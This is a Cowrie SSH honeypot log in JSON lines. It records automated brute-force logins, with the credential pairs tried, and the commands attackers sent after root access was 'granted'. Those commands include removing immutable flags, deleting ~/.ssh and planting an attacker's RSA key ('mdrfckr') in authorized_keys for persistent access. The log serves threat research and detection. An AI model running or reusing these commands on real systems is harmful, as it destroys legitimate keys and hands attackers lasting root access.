{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:13.120201Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:13.435755Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe!","message":"login attempt [root/123qwe!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:42:15.142165Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:42:15.847931Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:42:15.848676Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:42:15.849957Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:16.166777Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":59988,"dst_ip":"1.2.3.4","dst_port":22,"session":"01a1bb7ff1a6","protocol":"ssh","message":"New connection: 45.150.34.92:59988 (1.2.3.4:22) [session: 01a1bb7ff1a6]","sensor":"my-vps","timestamp":"2025-09-08T23:42:16.293792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:16.294783Z","src_ip":"45.150.34.92","session":"01a1bb7ff1a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:16.312489Z","src_ip":"45.150.34.92","session":"01a1bb7ff1a6"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T23:42:16.424198Z","src_ip":"45.150.34.92","session":"01a1bb7ff1a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:42:16.830147Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:42:16.830899Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:42:17.282359Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:17.283671Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:17.443166Z","src_ip":"45.150.34.92","session":"01a1bb7ff1a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59976,"dst_ip":"1.2.3.4","dst_port":22,"session":"a547eab9857e","protocol":"ssh","message":"New connection: 212.227.235.229:59976 (1.2.3.4:22) [session: a547eab9857e]","sensor":"my-vps","timestamp":"2025-09-08T23:42:17.585317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:17.586457Z","src_ip":"212.227.235.229","session":"a547eab9857e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:17.896654Z","src_ip":"212.227.235.229","session":"a547eab9857e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:42:19.180624Z","src_ip":"212.227.235.229","session":"a547eab9857e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:20.494307Z","src_ip":"212.227.235.229","session":"a547eab9857e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59988,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdf84db81083","protocol":"ssh","message":"New connection: 212.227.235.229:59988 (1.2.3.4:22) [session: fdf84db81083]","sensor":"my-vps","timestamp":"2025-09-08T23:42:20.805735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:20.806602Z","src_ip":"212.227.235.229","session":"fdf84db81083"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:21.122619Z","src_ip":"212.227.235.229","session":"fdf84db81083"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:42:22.422052Z","src_ip":"212.227.235.229","session":"fdf84db81083"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:22.744389Z","src_ip":"212.227.235.229","session":"fdf84db81083"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:22.750998Z","src_ip":"212.227.235.229","session":"b7f34449b784"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":57828,"dst_ip":"1.2.3.4","dst_port":22,"session":"039a2f0cf13a","protocol":"ssh","message":"New connection: 182.18.161.165:57828 (1.2.3.4:22) [session: 039a2f0cf13a]","sensor":"my-vps","timestamp":"2025-09-08T23:42:24.576854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:24.577947Z","src_ip":"182.18.161.165","session":"039a2f0cf13a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:24.822700Z","src_ip":"182.18.161.165","session":"039a2f0cf13a"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T23:42:25.839474Z","src_ip":"182.18.161.165","session":"039a2f0cf13a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:27.086005Z","src_ip":"182.18.161.165","session":"039a2f0cf13a"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":52406,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbe8981af487","protocol":"ssh","message":"New connection: 93.113.63.124:52406 (1.2.3.4:22) [session: cbe8981af487]","sensor":"my-vps","timestamp":"2025-09-08T23:42:44.180114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:44.181493Z","src_ip":"93.113.63.124","session":"cbe8981af487"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:44.299014Z","src_ip":"93.113.63.124","session":"cbe8981af487"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"1234567","message":"login attempt [esuser/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T23:42:44.592299Z","src_ip":"93.113.63.124","session":"cbe8981af487"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:45.911516Z","src_ip":"93.113.63.124","session":"cbe8981af487"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":46150,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ca22bc6496c","protocol":"ssh","message":"New connection: 46.101.8.63:46150 (1.2.3.4:22) [session: 9ca22bc6496c]","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.498329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.499299Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.522034Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin888","message":"login attempt [root/admin888] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.654318Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:42:56.754939Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.755880Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.757489Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.782319Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:42:56.894155Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.894933Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.920292Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.921285Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":46422,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6bdeb27e918","protocol":"ssh","message":"New connection: 46.101.8.63:46422 (1.2.3.4:22) [session: a6bdeb27e918]","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.943052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.943893Z","src_ip":"46.101.8.63","session":"a6bdeb27e918"}
